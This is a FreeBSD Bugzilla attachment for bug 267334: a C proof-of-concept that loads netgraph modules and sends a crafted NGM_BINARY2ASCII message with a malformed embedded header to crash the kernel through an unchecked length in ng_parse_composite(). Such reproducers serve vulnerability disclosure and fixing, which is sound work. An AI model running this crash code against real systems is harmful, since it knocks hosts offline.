FreeBSD Bugzilla – Attachment 237614 Details for
Bug 267334
ng_parse_composite() passes length to malloc() without check
provoke a crash in netgraph ng_parse_composite()
ng12a.c (text/plain), 1.24 KB, created by Robert Morris on 2022-10-25 13:10:36 UTC
>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <sys/ioctl.h>
>#include <netinet/in.h>
>#include <sys/wait.h>
>#include <sys/resource.h>
>#include <arpa/inet.h>
>#include <assert.h>
>#include <ctype.h>
>#include <fcntl.h>
>#include <signal.h>
>#include <netgraph/ng_message.h>
>#include <netgraph/ng_socket.h>
>#include <netgraph.h>
>
>int
>main(){
>  // Load the netgraph and ng_ppp kernel modules.
>  system("kldload netgraph");
>  system("kldload ng_ppp");
>
>  // Create a netgraph socket node: cs is the control socket, ds the data socket.
>  int cs = -1;
>  int ds = -1;
>  NgMkSockNode(NULL, &cs, &ds);
>
>  // Attach a ppp node as a peer of the socket node.
>  struct ngm_mkpeer mkp;
>  memset(&mkp, 0, sizeof(mkp));
>  strcpy(mkp.type, "ppp");
>  strcpy(mkp.ourhook, "hook");
>  strcpy(mkp.peerhook, "atalk");
>
>  if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
>                NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
>    fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
>  }
>
>  char *path = ".:";
>  int cmd = NGM_BINARY2ASCII;
>
>  // Argument for NGM_BINARY2ASCII: an embedded message header in a
>  // 128-byte buffer whose remaining bytes are all 0xff.
>  char arg[128];
>  memset(arg, 0xff, sizeof(arg));
>  *(long long *)(arg + 0) = 0x48ffffffff;  // first 8 bytes of hdr
>  *(int *)(arg + 8) = NGM_LISTNAMES; // hdr cmd
>  *(int *)(arg + 12) = 0xffffffff; // hdr flags
>  *(int *)(arg + 16) = 0xffffffff; // hdr token
>  *(int *)(arg + 20) = NGM_GENERIC_COOKIE; // hdr cookie
>
>  NgSendMsg(cs, path, NGM_GENERIC_COOKIE, cmd, arg, sizeof(arg));
>}